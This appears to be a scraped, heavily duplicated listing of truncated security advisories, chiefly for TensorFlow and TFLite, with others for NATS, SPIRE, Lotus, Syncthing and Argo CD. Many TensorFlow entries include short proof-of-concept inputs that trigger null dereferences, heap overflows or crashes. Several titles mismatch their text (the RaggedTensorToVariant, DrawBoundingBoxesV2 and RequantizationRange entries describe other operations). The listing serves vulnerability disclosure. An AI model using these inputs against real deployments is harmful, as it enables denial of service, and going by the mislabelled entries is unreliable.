Calling tf.raw_ops.RaggedTensorToVariant with arguments specifying an invalid ragged tensor results in a null pointer dereference: import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) filter_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) tf.raw_ops.Conv3D(input=input_tensor, filter=filter_tensor, strides=[1, 56, 56, 56, 1], padding='VALID', data_format='NDHWC', dilations=[1, 1, 1, 23, 1]) import tensorflow as tf input_tensor = tf.constant([], shape=[2, 2, 2, 2, 0], dtype=tf.float32) filter_tensor = tf.constant([], shape=[0, 0, 2, …

Null pointer dereference in TFLite's `Reshape` operator

The fix for CVE-2020-15209 missed the case when the target shape of Reshape operator is given by the elements of a 1-D tensor. As such, the fix for the vulnerability allowed passing a null-buffer-backed tensor with a 1D shape: if (tensor->data.raw == nullptr && tensor->bytes > 0) { if (registration.builtin_code == kTfLiteBuiltinReshape && i == 1) { // In general, having a tensor here with no buffer will be an …

Null pointer dereference in TFLite's `Reshape` operator

The fix for CVE-2020-15209 missed the case when the target shape of Reshape operator is given by the elements of a 1-D tensor. As such, the fix for the vulnerability allowed passing a null-buffer-backed tensor with a 1D shape: if (tensor->data.raw == nullptr && tensor->bytes > 0) { if (registration.builtin_code == kTfLiteBuiltinReshape && i == 1) { // In general, having a tensor here with no buffer will be an …

Null pointer dereference in TFLite's `Reshape` operator

The fix for CVE-2020-15209 missed the case when the target shape of Reshape operator is given by the elements of a 1-D tensor. As such, the fix for the vulnerability allowed passing a null-buffer-backed tensor with a 1D shape: if (tensor->data.raw == nullptr && tensor->bytes > 0) { if (registration.builtin_code == kTfLiteBuiltinReshape && i == 1) { // In general, having a tensor here with no buffer will be an …

Null pointer dereference in `StringNGrams`

An attacker can trigger a dereference of a null pointer in tf.raw_ops.StringNGrams: import tensorflow as tf data=tf.constant([''] * 11, shape=[11], dtype=tf.string) splits = [0]*115 splits.append(3) data_splits=tf.constant(splits, shape=[116], dtype=tf.int64) tf.raw_ops.StringNGrams(data=data, data_splits=data_splits, separator=b'Ss', ngram_widths=[7,6,11], left_pad='ABCDE', right_pad=b'ZYXWVU', pad_width=50, preserve_short_sequences=True)

Null pointer dereference in `StringNGrams`

An attacker can trigger a dereference of a null pointer in tf.raw_ops.StringNGrams: import tensorflow as tf data=tf.constant([''] * 11, shape=[11], dtype=tf.string) splits = [0]*115 splits.append(3) data_splits=tf.constant(splits, shape=[116], dtype=tf.int64) tf.raw_ops.StringNGrams(data=data, data_splits=data_splits, separator=b'Ss', ngram_widths=[7,6,11], left_pad='ABCDE', right_pad=b'ZYXWVU', pad_width=50, preserve_short_sequences=True)

Null pointer dereference in `StringNGrams`

An attacker can trigger a dereference of a null pointer in tf.raw_ops.StringNGrams: import tensorflow as tf data=tf.constant([''] * 11, shape=[11], dtype=tf.string) splits = [0]*115 splits.append(3) data_splits=tf.constant(splits, shape=[116], dtype=tf.int64) tf.raw_ops.StringNGrams(data=data, data_splits=data_splits, separator=b'Ss', ngram_widths=[7,6,11], left_pad='ABCDE', right_pad=b'ZYXWVU', pad_width=50, preserve_short_sequences=True)

Null pointer dereference in `SparseFillEmptyRows`

An attacker can trigger a null pointer dereference in the implementation of tf.raw_ops.SparseFillEmptyRows: import tensorflow as tf indices = tf.constant([], shape=[0, 0], dtype=tf.int64) values = tf.constant([], shape=[0], dtype=tf.int64) dense_shape = tf.constant([], shape=[0], dtype=tf.int64) default_value = 0 tf.raw_ops.SparseFillEmptyRows( indices=indices, values=values, dense_shape=dense_shape, default_value=default_value)

Null pointer dereference in `SparseFillEmptyRows`

An attacker can trigger a null pointer dereference in the implementation of tf.raw_ops.SparseFillEmptyRows: import tensorflow as tf indices = tf.constant([], shape=[0, 0], dtype=tf.int64) values = tf.constant([], shape=[0], dtype=tf.int64) dense_shape = tf.constant([], shape=[0], dtype=tf.int64) default_value = 0 tf.raw_ops.SparseFillEmptyRows( indices=indices, values=values, dense_shape=dense_shape, default_value=default_value)

Null pointer dereference in `SparseFillEmptyRows`

An attacker can trigger a null pointer dereference in the implementation of tf.raw_ops.SparseFillEmptyRows: import tensorflow as tf indices = tf.constant([], shape=[0, 0], dtype=tf.int64) values = tf.constant([], shape=[0], dtype=tf.int64) dense_shape = tf.constant([], shape=[0], dtype=tf.int64) default_value = 0 tf.raw_ops.SparseFillEmptyRows( indices=indices, values=values, dense_shape=dense_shape, default_value=default_value)

Null pointer dereference in `EditDistance`

An attacker can trigger a null pointer dereference in the implementation of tf.raw_ops.EditDistance: import tensorflow as tf hypothesis_indices = tf.constant([247, 247, 247], shape=[1, 3], dtype=tf.int64) hypothesis_values = tf.constant([-9.9999], shape=[1], dtype=tf.float32) hypothesis_shape = tf.constant([0, 0, 0], shape=[3], dtype=tf.int64) truth_indices = tf.constant([], shape=[0, 3], dtype=tf.int64) truth_values = tf.constant([], shape=[0], dtype=tf.float32) truth_shape = tf.constant([0, 0, 0], shape=[3], dtype=tf.int64) tf.raw_ops.EditDistance( hypothesis_indices=hypothesis_indices, hypothesis_values=hypothesis_values, hypothesis_shape=hypothesis_shape, truth_indices=truth_indices, truth_values=truth_values, truth_shape=truth_shape, normalize=True)

Null pointer dereference in `EditDistance`

An attacker can trigger a null pointer dereference in the implementation of tf.raw_ops.EditDistance: import tensorflow as tf hypothesis_indices = tf.constant([247, 247, 247], shape=[1, 3], dtype=tf.int64) hypothesis_values = tf.constant([-9.9999], shape=[1], dtype=tf.float32) hypothesis_shape = tf.constant([0, 0, 0], shape=[3], dtype=tf.int64) truth_indices = tf.constant([], shape=[0, 3], dtype=tf.int64) truth_values = tf.constant([], shape=[0], dtype=tf.float32) truth_shape = tf.constant([0, 0, 0], shape=[3], dtype=tf.int64) tf.raw_ops.EditDistance( hypothesis_indices=hypothesis_indices, hypothesis_values=hypothesis_values, hypothesis_shape=hypothesis_shape, truth_indices=truth_indices, truth_values=truth_values, truth_shape=truth_shape, normalize=True)

Null pointer dereference in `EditDistance`

An attacker can trigger a null pointer dereference in the implementation of tf.raw_ops.EditDistance: import tensorflow as tf hypothesis_indices = tf.constant([247, 247, 247], shape=[1, 3], dtype=tf.int64) hypothesis_values = tf.constant([-9.9999], shape=[1], dtype=tf.float32) hypothesis_shape = tf.constant([0, 0, 0], shape=[3], dtype=tf.int64) truth_indices = tf.constant([], shape=[0, 3], dtype=tf.int64) truth_values = tf.constant([], shape=[0], dtype=tf.float32) truth_shape = tf.constant([0, 0, 0], shape=[3], dtype=tf.int64) tf.raw_ops.EditDistance( hypothesis_indices=hypothesis_indices, hypothesis_values=hypothesis_values, hypothesis_shape=hypothesis_shape, truth_indices=truth_indices, truth_values=truth_values, truth_shape=truth_shape, normalize=True)

Nil dereference in NATS JWT, DoS of nats-server

(This advisory is canonically https://advisories.nats.io/CVE/CVE-2020-26521.txt) Problem Description The NATS account system has an Operator trusted by the servers, which signs Accounts, and each Account can then create and sign Users within their account. The Operator should be able to safely issue Accounts to other entities which it does not fully trust. A malicious Account could create and sign a User JWT with a state not created by the normal tooling, …

Nil dereference in NATS JWT causing DoS of nats-server

(This advisory is canonically https://advisories.nats.io/CVE/CVE-2020-26521.txt) Problem Description The NATS account system has an Operator trusted by the servers, which signs Accounts, and each Account can then create and sign Users within their account. The Operator should be able to safely issue Accounts to other entities which it does not fully trust. A malicious Account could create and sign a User JWT with a state not created by the normal tooling, …

Memory corruption in `DrawBoundingBoxesV2`

The implementation of tf.raw_ops.MaxPoolGradWithArgmax can cause reads outside of bounds of heap allocated data if attacker supplies specially crafted inputs: import tensorflow as tf images = tf.fill([10, 96, 0, 1], 0.) boxes = tf.fill([10, 53, 0], 0.) colors = tf.fill([0, 1], 0.) tf.raw_ops.DrawBoundingBoxesV2(images=images, boxes=boxes, colors=colors)

Memory corruption in `DrawBoundingBoxesV2`

The implementation of tf.raw_ops.MaxPoolGradWithArgmax can cause reads outside of bounds of heap allocated data if attacker supplies specially crafted inputs: import tensorflow as tf images = tf.fill([10, 96, 0, 1], 0.) boxes = tf.fill([10, 53, 0], 0.) colors = tf.fill([0, 1], 0.) tf.raw_ops.DrawBoundingBoxesV2(images=images, boxes=boxes, colors=colors)

Memory corruption in `DrawBoundingBoxesV2`

The implementation of tf.raw_ops.MaxPoolGradWithArgmax can cause reads outside of bounds of heap allocated data if attacker supplies specially crafted inputs: import tensorflow as tf images = tf.fill([10, 96, 0, 1], 0.) boxes = tf.fill([10, 53, 0], 0.) colors = tf.fill([0, 1], 0.) tf.raw_ops.DrawBoundingBoxesV2(images=images, boxes=boxes, colors=colors)

Lack of validation in `SparseDenseCwiseMul`

Due to lack of validation in tf.raw_ops.SparseDenseCwiseMul, an attacker can trigger denial of service via CHECK-fails or accesses to outside the bounds of heap allocated data: import tensorflow as tf indices = tf.constant([], shape=[10, 0], dtype=tf.int64) values = tf.constant([], shape=[0], dtype=tf.int64) shape = tf.constant([0, 0], shape=[2], dtype=tf.int64) dense = tf.constant([], shape=[0], dtype=tf.int64) tf.raw_ops.SparseDenseCwiseMul( sp_indices=indices, sp_values=values, sp_shape=shape, dense=dense)

Lack of validation in `SparseDenseCwiseMul`

Due to lack of validation in tf.raw_ops.SparseDenseCwiseMul, an attacker can trigger denial of service via CHECK-fails or accesses to outside the bounds of heap allocated data: import tensorflow as tf indices = tf.constant([], shape=[10, 0], dtype=tf.int64) values = tf.constant([], shape=[0], dtype=tf.int64) shape = tf.constant([0, 0], shape=[2], dtype=tf.int64) dense = tf.constant([], shape=[0], dtype=tf.int64) tf.raw_ops.SparseDenseCwiseMul( sp_indices=indices, sp_values=values, sp_shape=shape, dense=dense)

Lack of validation in `SparseDenseCwiseMul`

Due to lack of validation in tf.raw_ops.SparseDenseCwiseMul, an attacker can trigger denial of service via CHECK-fails or accesses to outside the bounds of heap allocated data: import tensorflow as tf indices = tf.constant([], shape=[10, 0], dtype=tf.int64) values = tf.constant([], shape=[0], dtype=tf.int64) shape = tf.constant([0, 0], shape=[2], dtype=tf.int64) dense = tf.constant([], shape=[0], dtype=tf.int64) tf.raw_ops.SparseDenseCwiseMul( sp_indices=indices, sp_values=values, sp_shape=shape, dense=dense)

Invalid validation in `SparseMatrixSparseCholesky`

An attacker can trigger a null pointer dereference by providing an invalid permutation to tf.raw_ops.SparseMatrixSparseCholesky: import tensorflow as tf import numpy as np from tensorflow.python.ops.linalg.sparse import sparse_csr_matrix_ops indices_array = np.array([[0, 0]]) value_array = np.array([-10.0], dtype=np.float32) dense_shape = [1, 1] st = tf.SparseTensor(indices_array, value_array, dense_shape) input = sparse_csr_matrix_ops.sparse_tensor_to_csr_sparse_matrix( st.indices, st.values, st.dense_shape) permutation = tf.constant([], shape=[1, 0], dtype=tf.int32) tf.raw_ops.SparseMatrixSparseCholesky(input=input, permutation=permutation, type=tf.float32)

Invalid validation in `SparseMatrixSparseCholesky`

An attacker can trigger a null pointer dereference by providing an invalid permutation to tf.raw_ops.SparseMatrixSparseCholesky: import tensorflow as tf import numpy as np from tensorflow.python.ops.linalg.sparse import sparse_csr_matrix_ops indices_array = np.array([[0, 0]]) value_array = np.array([-10.0], dtype=np.float32) dense_shape = [1, 1] st = tf.SparseTensor(indices_array, value_array, dense_shape) input = sparse_csr_matrix_ops.sparse_tensor_to_csr_sparse_matrix( st.indices, st.values, st.dense_shape) permutation = tf.constant([], shape=[1, 0], dtype=tf.int32) tf.raw_ops.SparseMatrixSparseCholesky(input=input, permutation=permutation, type=tf.float32)

Invalid validation in `SparseMatrixSparseCholesky`

An attacker can trigger a null pointer dereference by providing an invalid permutation to tf.raw_ops.SparseMatrixSparseCholesky: import tensorflow as tf import numpy as np from tensorflow.python.ops.linalg.sparse import sparse_csr_matrix_ops indices_array = np.array([[0, 0]]) value_array = np.array([-10.0], dtype=np.float32) dense_shape = [1, 1] st = tf.SparseTensor(indices_array, value_array, dense_shape) input = sparse_csr_matrix_ops.sparse_tensor_to_csr_sparse_matrix( st.indices, st.values, st.dense_shape) permutation = tf.constant([], shape=[1, 0], dtype=tf.int32) tf.raw_ops.SparseMatrixSparseCholesky(input=input, permutation=permutation, type=tf.float32)

Invalid validation in `QuantizeAndDequantizeV2`

The validation in tf.raw_ops.QuantizeAndDequantizeV2 allows invalid values for axis argument: import tensorflow as tf input_tensor = tf.constant([0.0], shape=[1], dtype=float) input_min = tf.constant(-10.0) input_max = tf.constant(-10.0) tf.raw_ops.QuantizeAndDequantizeV2( input=input_tensor, input_min=input_min, input_max=input_max, signed_input=False, num_bits=1, range_given=False, round_mode='HALF_TO_EVEN', narrow_range=False, axis=-2)

Invalid validation in `QuantizeAndDequantizeV2`

The validation in tf.raw_ops.QuantizeAndDequantizeV2 allows invalid values for axis argument: import tensorflow as tf input_tensor = tf.constant([0.0], shape=[1], dtype=float) input_min = tf.constant(-10.0) input_max = tf.constant(-10.0) tf.raw_ops.QuantizeAndDequantizeV2( input=input_tensor, input_min=input_min, input_max=input_max, signed_input=False, num_bits=1, range_given=False, round_mode='HALF_TO_EVEN', narrow_range=False, axis=-2)

Invalid validation in `QuantizeAndDequantizeV2`

The validation in tf.raw_ops.QuantizeAndDequantizeV2 allows invalid values for axis argument: import tensorflow as tf input_tensor = tf.constant([0.0], shape=[1], dtype=float) input_min = tf.constant(-10.0) input_max = tf.constant(-10.0) tf.raw_ops.QuantizeAndDequantizeV2( input=input_tensor, input_min=input_min, input_max=input_max, signed_input=False, num_bits=1, range_given=False, round_mode='HALF_TO_EVEN', narrow_range=False, axis=-2)

Interpreter crash from `tf.io.decode_raw`

The implementation of tf.io.decode_raw produces incorrect results and crashes the Python interpreter when combining fixed_length and wider datatypes. import tensorflow as tf tf.io.decode_raw(tf.constant(["1","2","3","4"]), tf.uint16, fixed_length=4)

Integer overflow in TFLite memory allocation

The TFLite code for allocating TFLiteIntArrays is vulnerable to an integer overflow issue: int TfLiteIntArrayGetSizeInBytes(int size) { static TfLiteIntArray dummy; return sizeof(dummy) + sizeof(dummy.data[0]) * size; } An attacker can craft a model such that the size multiplier is so large that the return value overflows the int datatype and becomes negative. In turn, this results in invalid value being given to malloc: TfLiteIntArray* TfLiteIntArrayCreate(int size) { TfLiteIntArray* ret = …

Integer overflow in TFLite memory allocation

The TFLite code for allocating TFLiteIntArrays is vulnerable to an integer overflow issue: int TfLiteIntArrayGetSizeInBytes(int size) { static TfLiteIntArray dummy; return sizeof(dummy) + sizeof(dummy.data[0]) * size; } An attacker can craft a model such that the size multiplier is so large that the return value overflows the int datatype and becomes negative. In turn, this results in invalid value being given to malloc: TfLiteIntArray* TfLiteIntArrayCreate(int size) { TfLiteIntArray* ret = …

Integer overflow in TFLite memory allocation

The TFLite code for allocating TFLiteIntArrays is vulnerable to an integer overflow issue: int TfLiteIntArrayGetSizeInBytes(int size) { static TfLiteIntArray dummy; return sizeof(dummy) + sizeof(dummy.data[0]) * size; } An attacker can craft a model such that the size multiplier is so large that the return value overflows the int datatype and becomes negative. In turn, this results in invalid value being given to malloc: TfLiteIntArray* TfLiteIntArrayCreate(int size) { TfLiteIntArray* ret = …

Integer overflow in TFLite concatentation

The TFLite implementation of concatenation is vulnerable to an integer overflow issue: for (int d = 0; d < t0->dims->size; ++d) { if (d == axis) { sum_axis += t->dims->data[axis]; } else { TF_LITE_ENSURE_EQ(context, t->dims->data[d], t0->dims->data[d]); } } An attacker can craft a model such that the dimensions of one of the concatenation input overflow the values of int. TFLite uses int to represent tensor dimensions, whereas TF uses int64. …

Integer overflow in TFLite concatentation

The TFLite implementation of concatenation is vulnerable to an integer overflow issue: for (int d = 0; d < t0->dims->size; ++d) { if (d == axis) { sum_axis += t->dims->data[axis]; } else { TF_LITE_ENSURE_EQ(context, t->dims->data[d], t0->dims->data[d]); } } An attacker can craft a model such that the dimensions of one of the concatenation input overflow the values of int. TFLite uses int to represent tensor dimensions, whereas TF uses int64. …

Integer overflow in TFLite concatentation

The TFLite implementation of concatenation is vulnerable to an integer overflow issue: for (int d = 0; d < t0->dims->size; ++d) { if (d == axis) { sum_axis += t->dims->data[axis]; } else { TF_LITE_ENSURE_EQ(context, t->dims->data[d], t0->dims->data[d]); } } An attacker can craft a model such that the dimensions of one of the concatenation input overflow the values of int. TFLite uses int to represent tensor dimensions, whereas TF uses int64. …

Incorrect handling of credential expiry by NATS Server

(This advisory is canonically https://advisories.nats.io/CVE/CVE-2020-26892.txt ) Problem Description NATS nats-server through 2020-10-07 has Incorrect Access Control because of how expired credentials are handled. The NATS accounts system has expiration timestamps on credentials; the https://github.com/nats-io/jwt library had an API which encouraged misuse and an IsRevoked() method which misused its own API. A new IsClaimRevoked() method has correct handling and the nats-server has been updated to use this. The old IsRevoked() method …

Incorrect handling of credential expiry by /nats-io/nats-server

(This advisory is canonically https://advisories.nats.io/CVE/CVE-2020-26892.txt ) Problem Description NATS nats-server through 2020-10-07 has Incorrect Access Control because of how expired credentials are handled. The NATS accounts system has expiration timestamps on credentials; the https://github.com/nats-io/jwt library had an API which encouraged misuse and an IsRevoked() method which misused its own API. A new IsClaimRevoked() method has correct handling and the nats-server has been updated to use this. The old IsRevoked() method …

Incorrect Default Permissions

A privilege escalation vulnerability impacting the Google Exposure Notification Verification Server (versions prior to 0.23.1), allows an attacker who (1) has UserWrite permissions and (2) is using a carefully crafted request or malicious proxy, to create another user with higher privileges than their own. This occurs due to insufficient checks on the allowed set of permissions. The new user creation event would be captured in the Event Log.

Incorrect Calculation of Buffer Size

TensorFlow is an end-to-end open source platform for machine learning. An attacker can trigger a denial of service via a CHECK-fail in converting sparse tensors to CSR Sparse matrices. This is because the implementation does a double redirection to access an element of an array allocated on the heap. If the value at indices + 1 is outside the bounds of csr_row_ptr, this results in writing outside of bounds of …

Incomplete validation in `tf.raw_ops.CTCLoss`

Incomplete validation in tf.raw_ops.CTCLoss allows an attacker to trigger an OOB read from heap: import tensorflow as tf inputs = tf.constant([], shape=[10, 16, 0], dtype=tf.float32) labels_indices = tf.constant([], shape=[8, 0], dtype=tf.int64) labels_values = tf.constant([-100] * 8, shape=[8], dtype=tf.int32) sequence_length = tf.constant([-100] * 16, shape=[16], dtype=tf.int32) tf.raw_ops.CTCLoss(inputs=inputs, labels_indices=labels_indices, labels_values=labels_values, sequence_length=sequence_length, preprocess_collapse_repeated=True, ctc_merge_repeated=False, ignore_longer_outputs_than_inputs=True) An attacker can also trigger a heap buffer overflow: import tensorflow as tf inputs = tf.constant([], shape=[7, 2, …

Incomplete validation in `tf.raw_ops.CTCLoss`

Incomplete validation in tf.raw_ops.CTCLoss allows an attacker to trigger an OOB read from heap: import tensorflow as tf inputs = tf.constant([], shape=[10, 16, 0], dtype=tf.float32) labels_indices = tf.constant([], shape=[8, 0], dtype=tf.int64) labels_values = tf.constant([-100] * 8, shape=[8], dtype=tf.int32) sequence_length = tf.constant([-100] * 16, shape=[16], dtype=tf.int32) tf.raw_ops.CTCLoss(inputs=inputs, labels_indices=labels_indices, labels_values=labels_values, sequence_length=sequence_length, preprocess_collapse_repeated=True, ctc_merge_repeated=False, ignore_longer_outputs_than_inputs=True) An attacker can also trigger a heap buffer overflow: import tensorflow as tf inputs = tf.constant([], shape=[7, 2, …

Incomplete validation in `tf.raw_ops.CTCLoss`

Incomplete validation in tf.raw_ops.CTCLoss allows an attacker to trigger an OOB read from heap: import tensorflow as tf inputs = tf.constant([], shape=[10, 16, 0], dtype=tf.float32) labels_indices = tf.constant([], shape=[8, 0], dtype=tf.int64) labels_values = tf.constant([-100] * 8, shape=[8], dtype=tf.int32) sequence_length = tf.constant([-100] * 16, shape=[16], dtype=tf.int32) tf.raw_ops.CTCLoss(inputs=inputs, labels_indices=labels_indices, labels_values=labels_values, sequence_length=sequence_length, preprocess_collapse_repeated=True, ctc_merge_repeated=False, ignore_longer_outputs_than_inputs=True) An attacker can also trigger a heap buffer overflow: import tensorflow as tf inputs = tf.constant([], shape=[7, 2, …

Incomplete validation in `SparseReshape`

Incomplete validation in SparseReshape results in a denial of service based on a CHECK-failure. import tensorflow as tf input_indices = tf.constant(41, shape=[1, 1], dtype=tf.int64) input_shape = tf.zeros([11], dtype=tf.int64) new_shape = tf.zeros([1], dtype=tf.int64) tf.raw_ops.SparseReshape(input_indices=input_indices, input_shape=input_shape, new_shape=new_shape)

Incomplete validation in `SparseReshape`

Incomplete validation in SparseReshape results in a denial of service based on a CHECK-failure. import tensorflow as tf input_indices = tf.constant(41, shape=[1, 1], dtype=tf.int64) input_shape = tf.zeros([11], dtype=tf.int64) new_shape = tf.zeros([1], dtype=tf.int64) tf.raw_ops.SparseReshape(input_indices=input_indices, input_shape=input_shape, new_shape=new_shape)

Incomplete validation in `SparseReshape`

Incomplete validation in SparseReshape results in a denial of service based on a CHECK-failure. import tensorflow as tf input_indices = tf.constant(41, shape=[1, 1], dtype=tf.int64) input_shape = tf.zeros([11], dtype=tf.int64) new_shape = tf.zeros([1], dtype=tf.int64) tf.raw_ops.SparseReshape(input_indices=input_indices, input_shape=input_shape, new_shape=new_shape)

Incomplete validation in `SparseAdd`

Incomplete validation in SparseAdd results in allowing attackers to exploit undefined behavior (dereferencing null pointers) as well as write outside of bounds of heap allocated data: import tensorflow as tf a_indices = tf.zeros([10, 97], dtype=tf.int64) a_values = tf.zeros([10], dtype=tf.int64) a_shape = tf.zeros([0], dtype=tf.int64) b_indices = tf.zeros([0, 0], dtype=tf.int64) b_values = tf.zeros([0], dtype=tf.int64) b_shape = tf.zeros([0], dtype=tf.int64) thresh = 0 tf.raw_ops.SparseAdd(a_indices=a_indices, a_values=a_values, a_shape=a_shape, b_indices=b_indices, b_values=b_values, b_shape=b_shape, thresh=thresh)

Incomplete validation in `SparseAdd`

Incomplete validation in SparseAdd results in allowing attackers to exploit undefined behavior (dereferencing null pointers) as well as write outside of bounds of heap allocated data: import tensorflow as tf a_indices = tf.zeros([10, 97], dtype=tf.int64) a_values = tf.zeros([10], dtype=tf.int64) a_shape = tf.zeros([0], dtype=tf.int64) b_indices = tf.zeros([0, 0], dtype=tf.int64) b_values = tf.zeros([0], dtype=tf.int64) b_shape = tf.zeros([0], dtype=tf.int64) thresh = 0 tf.raw_ops.SparseAdd(a_indices=a_indices, a_values=a_values, a_shape=a_shape, b_indices=b_indices, b_values=b_values, b_shape=b_shape, thresh=thresh)

Incomplete validation in `SparseAdd`

Incomplete validation in SparseAdd results in allowing attackers to exploit undefined behavior (dereferencing null pointers) as well as write outside of bounds of heap allocated data: import tensorflow as tf a_indices = tf.zeros([10, 97], dtype=tf.int64) a_values = tf.zeros([10], dtype=tf.int64) a_shape = tf.zeros([0], dtype=tf.int64) b_indices = tf.zeros([0, 0], dtype=tf.int64) b_values = tf.zeros([0], dtype=tf.int64) b_shape = tf.zeros([0], dtype=tf.int64) thresh = 0 tf.raw_ops.SparseAdd(a_indices=a_indices, a_values=a_values, a_shape=a_shape, b_indices=b_indices, b_values=b_values, b_shape=b_shape, thresh=thresh)

Improper Verification of Cryptographic Signature

Lotus is an Implementation of the Filecoin protocol written in Go. BLS signature validation in lotus uses blst library method VerifyCompressed. This method accepts signatures in 2 forms: "serialized", and "compressed", meaning that BLS signatures can be provided as either of 2 unique byte arrays. Lotus block validation functions perform a uniqueness check on provided blocks. Two blocks are considered distinct if the CIDs of their blockheader do not match. …

Improper Input Validation

Syncthing is a continuous file synchronization program. In Syncthing before version 1.15.0, the relay server strelaysrv can be caused to crash and exit by sending a relay message with a negative length field. Similarly, Syncthing itself can crash for the same reason if given a malformed message from a malicious relay server when attempting to join the relay. Relay joins are essentially random (from a subset of low latency relays) …

Improper Check for Unusual or Exceptional Conditions

TensorFlow is an end-to-end open source platform for machine learning. An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.QuantizeAndDequantizeV4Grad. This is because the implementation does not validate the rank of the input_* tensors. In turn, this results in the tensors being passes as they are to QuantizeAndDequantizePerChannelGradientImpl. However, the vec<T> method, requires the rank to 1 and triggers a CHECK failure otherwise. The fix will be …

Improper Certificate Validation

In SPIRE 0.8.1 through 0.8.4 and before versions 0.9.4, 0.10.2, 0.11.3 and 0.12.1, specially crafted requests to the FetchX509SVID RPC of SPIRE Server’s Legacy Node API can result in the possible issuance of an X.509 certificate with a URI SAN for a SPIFFE ID that the agent is not authorized to distribute. Proper controls are in place to require that the caller presents a valid agent certificate that is already …

Improper Certificate Validation

In SPIRE 0.8.1 through 0.8.4 and before versions 0.9.4, 0.10.2, 0.11.3 and 0.12.1, specially crafted requests to the FetchX509SVID RPC of SPIRE Server’s Legacy Node API can result in the possible issuance of an X.509 certificate with a URI SAN for a SPIFFE ID that the agent is not authorized to distribute. Proper controls are in place to require that the caller presents a valid agent certificate that is already …

Import token permissions checking not enforced

(This advisory is canonically https://advisories.nats.io/CVE/CVE-2021-3127.txt) Problem Description The NATS server provides for Subjects which are namespaced by Account; all Subjects are supposed to be private to an account, with an Export/Import system used to grant cross-account access to some Subjects. Some Exports are public, such that anyone can import the relevant subjects, and some Exports are private, such that the Import requires a token JWT to prove permission. The JWT …

Import of incorrectly embargoed keys could cause early publication

Impact If your installation is using the export-importer service, there is potential impact. If your installation is not importing keys via the export-importer services, your installation is not impacted. In versions 0.19.1 and earlier, the export-importer service assumed that the server it was importing from had properly embargoed keys for at least 2 hours after their expiry time. There are now known instances of servers that did not properly embargo …

Import loops in account imports, nats-server DoS

(This advisory is canonically https://advisories.nats.io/CVE/CVE-2020-28466.txt) Problem Description An export/import cycle between accounts could crash the nats-server, after consuming CPU and memory. This issue was fixed publicly in https://github.com/nats-io/nats-server/pull/1731 in November 2020. The need to call this out as a security issue was highlighted by snyk.io and we are grateful for their assistance in doing so. Organizations which run a NATS service providing access to accounts run by untrusted third parties …

Helm OCI credentials leaked into Argo CD logs

Impact When Argo CD was connected to a Helm OCI repository with authentication enabled, the credentials used for accessing the remote repository were logged. Anyone with access to the pod logs - either via access with appropriate permissions to the Kubernetes control plane or a third party log management system where the logs from Argo CD were aggregated - could have potentially obtained the credentials to the Helm OCI repository. …

Heap out of bounds write in `RaggedBinCount`

If the splits argument of RaggedBincount does not specify a valid SparseTensor, then an attacker can trigger a heap buffer overflow: import tensorflow as tf tf.raw_ops.RaggedBincount(splits=[7,8], values= [5, 16, 51, 76, 29, 27, 54, 95],\ size= 59, weights= [0, 0, 0, 0, 0, 0, 0, 0],\ binary_output=False)

Heap out of bounds write in `RaggedBinCount`

If the splits argument of RaggedBincount does not specify a valid SparseTensor, then an attacker can trigger a heap buffer overflow: import tensorflow as tf tf.raw_ops.RaggedBincount(splits=[7,8], values= [5, 16, 51, 76, 29, 27, 54, 95],\ size= 59, weights= [0, 0, 0, 0, 0, 0, 0, 0],\ binary_output=False)

Heap out of bounds write in `RaggedBinCount`

If the splits argument of RaggedBincount does not specify a valid SparseTensor, then an attacker can trigger a heap buffer overflow: import tensorflow as tf tf.raw_ops.RaggedBincount(splits=[7,8], values= [5, 16, 51, 76, 29, 27, 54, 95],\ size= 59, weights= [0, 0, 0, 0, 0, 0, 0, 0],\ binary_output=False)

Heap out of bounds read in `RequantizationRange`

The implementation of tf.raw_ops.MaxPoolGradWithArgmax can cause reads outside of bounds of heap allocated data if attacker supplies specially crafted inputs: import tensorflow as tf input = tf.constant([1], shape=[1], dtype=tf.qint32) input_max = tf.constant([], dtype=tf.float32) input_min = tf.constant([], dtype=tf.float32) tf.raw_ops.RequantizationRange(input=input, input_min=input_min, input_max=input_max)

Heap out of bounds read in `RequantizationRange`

The implementation of tf.raw_ops.MaxPoolGradWithArgmax can cause reads outside of bounds of heap allocated data if attacker supplies specially crafted inputs: import tensorflow as tf input = tf.constant([1], shape=[1], dtype=tf.qint32) input_max = tf.constant([], dtype=tf.float32) input_min = tf.constant([], dtype=tf.float32) tf.raw_ops.RequantizationRange(input=input, input_min=input_min, input_max=input_max)

Heap out of bounds read in `RequantizationRange`

The implementation of tf.raw_ops.MaxPoolGradWithArgmax can cause reads outside of bounds of heap allocated data if attacker supplies specially crafted inputs: import tensorflow as tf input = tf.constant([1], shape=[1], dtype=tf.qint32) input_max = tf.constant([], dtype=tf.float32) input_min = tf.constant([], dtype=tf.float32) tf.raw_ops.RequantizationRange(input=input, input_min=input_min, input_max=input_max)

Heap out of bounds read in `MaxPoolGradWithArgmax`

The implementation of tf.raw_ops.MaxPoolGradWithArgmax can cause reads outside of bounds of heap allocated data if attacker supplies specially crafted inputs: import tensorflow as tf input = tf.constant([10.0, 10.0, 10.0], shape=[1, 1, 3, 1], dtype=tf.float32) grad = tf.constant([10.0, 10.0, 10.0, 10.0], shape=[1, 1, 1, 4], dtype=tf.float32) argmax = tf.constant([1], shape=[1], dtype=tf.int64) ksize = [1, 1, 1, 1] strides = [1, 1, 1, 1] tf.raw_ops.MaxPoolGradWithArgmax( input=input, grad=grad, argmax=argmax, ksize=ksize, strides=strides, padding='SAME', include_batch_in_index=False)

Heap out of bounds read in `MaxPoolGradWithArgmax`

The implementation of tf.raw_ops.MaxPoolGradWithArgmax can cause reads outside of bounds of heap allocated data if attacker supplies specially crafted inputs: import tensorflow as tf input = tf.constant([10.0, 10.0, 10.0], shape=[1, 1, 3, 1], dtype=tf.float32) grad = tf.constant([10.0, 10.0, 10.0, 10.0], shape=[1, 1, 1, 4], dtype=tf.float32) argmax = tf.constant([1], shape=[1], dtype=tf.int64) ksize = [1, 1, 1, 1] strides = [1, 1, 1, 1] tf.raw_ops.MaxPoolGradWithArgmax( input=input, grad=grad, argmax=argmax, ksize=ksize, strides=strides, padding='SAME', include_batch_in_index=False)

Heap out of bounds read in `MaxPoolGradWithArgmax`

